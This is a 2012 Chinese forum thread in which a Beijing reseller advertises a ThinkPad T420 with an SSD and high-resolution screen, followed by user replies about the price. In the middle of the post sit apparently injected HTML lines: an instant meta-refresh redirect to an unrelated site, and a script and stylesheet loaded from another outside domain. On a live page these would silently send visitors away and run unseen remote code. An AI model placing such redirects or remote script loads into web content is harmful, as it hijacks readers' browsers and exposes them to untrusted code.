开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

号外,到货!T420A53高分固态九芯,翔意首推活动,只要7500!

T420-A53
美国
i5-2520
2.50G
4G
1*4G
160G
SSD

DVDRW
Nvidia+INTEL
NVS4200+3000
1G
14.1寸宽屏
1600*900
LED背光
蓝牙/摄像头/指纹/9芯电池
(9芯换6芯-100元)
  7500元
  7700元
库存稳定
货源稳定
翔意推荐
首先,高分屏对显卡性能要求比较高,导致电脑整体配置要求比较高,这是高端机器使用高分的一个重要原因。
高分屏优点

1,屏幕看的多,工作面积加大,能同时显示更多的内容,让用户可以同时进行多项工作而无须频繁切换,特别是photoshop图片处理。
2,适合图形处理,游戏!
3,看电影比较舒服!

其次,固态的优点
1. 启动快,没有电机加速旋转的过程。  2. 不用磁头,快速随机读取,读延迟极小。根据相关测试:两台电脑在同样配置的电脑下,搭载固态硬盘的笔记本从开机到出现桌面一共只用了18秒,而搭载传统硬盘的笔记本总共用了31秒,两者几乎有将近一半的差距。  3. 相对固定的读取时间。由于寻址时间与数据存储位置无关,因此磁盘碎片不会影响读取时间。  4. 基于DRAM的固态硬盘写入速度极快。  5. 无噪音。因为没有机械马达和风扇,工作时噪音值为0分贝。某些高端或大容量产品装有风扇,因此仍会产生噪音。  6. 低容量的基于闪存的固态硬盘在工作状态下能耗和发热量较低,但高端或大容量产品能耗会较高。  7. 内部不存在任何机械活动部件,不会发生机械故障,也不怕碰撞、冲击、振动。这样即使在高速移动甚至伴随翻转倾斜的情况下也不会影响到正常使用,而且在笔记本电脑发生意外掉落或与硬物碰撞时能够将数据丢失的可能性降到最小。  8. 工作温度范围更大。典型的硬盘驱动器只能在5到55摄氏度范围内工作。而大多数固态硬盘可在-10~70摄氏度工作,一些工业级的固态硬盘还可在-40~85摄氏度,甚至更大的温度范围下工作。  9. 低容量的固态硬盘比同容量硬盘体积小、重量轻。但这一优势随容量增大而逐渐减弱。直至256GB,固态硬盘仍比相同容量的普通硬盘轻。最后,九芯 就不解释了~哥几个都懂~图片晚点到货发上来~~ 以上的以上 只要7500,7600您就可以拥有哦~ 虽然它不是什么某国欧莱雅,但您绝对值得拥有!!!到货了!!!!!!

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

好机器哇
yuxyxx 发表于 2012-3-27 13:01
不错的机器呀~~~上X64的话,最好还是加到8G,4G的话还真有点压力,上mop容易多图杀猫~ ...

加吧加吧~  几分钟的事 ~
admini 发表于 2012-3-27 13:13
好机器哇

MINI  收了吧~
逆天配置,合理价位,i5,SSD,高分屏,9芯电池,如此多的卖点,仅售7600元!

到货了吗?明天可以拿到吗?  发表于 2012-3-28 09:31
好机器,好机器,坐等降价,哈哈哈
机器确实不错。。。。
真便宜。。。
唉,买早了
clg176 发表于 2012-3-27 14:27
唉,买早了

早买早用了~
早买了两年
samluo 发表于 2012-3-27 14:35
早买早用了~

以旧换新不?
心动啊。。。
不错啊!早了一天,不然可能会考虑
神器啊。。。如果处理器是I7的话,二话不说,马上入手!!
stephenchou 发表于 2012-3-27 15:22
心动啊。。。

心动不如行动~
daimonliu 发表于 2012-3-27 15:47 神器啊。。。如果处理器是I7的话,二话不说,马上入手!!
那价格就不是这个了~亲~
samluo 发表于 2012-3-27 13:34
MINI  收了吧~

哎,机器买早了
admini 发表于 2012-3-27 17:02
哎,机器买早了

换了呗~~ 您都潜了这么久 该出手时就出手~哈哈
买早了。。。。。。。。。。。。。。。
就是一个好的说啊
神器级别的东西啊。。。望尘莫及啊!!电脑又不能买着收藏!要那么多也没用啊
daimonliu 发表于 2012-3-28 00:08  神器级别的东西啊。。。望尘莫及啊!!电脑又不能买着收藏!要那么多也没用啊 ...

望眼欲穿啊~哈哈
真是买早了。。。。ssd、i5居然8000不到。。。。。诶
楼主最后一句话,“绝对”打成了“觉得”。。。。
好机器啊!!加个500G硬盘得花多少银子啊!!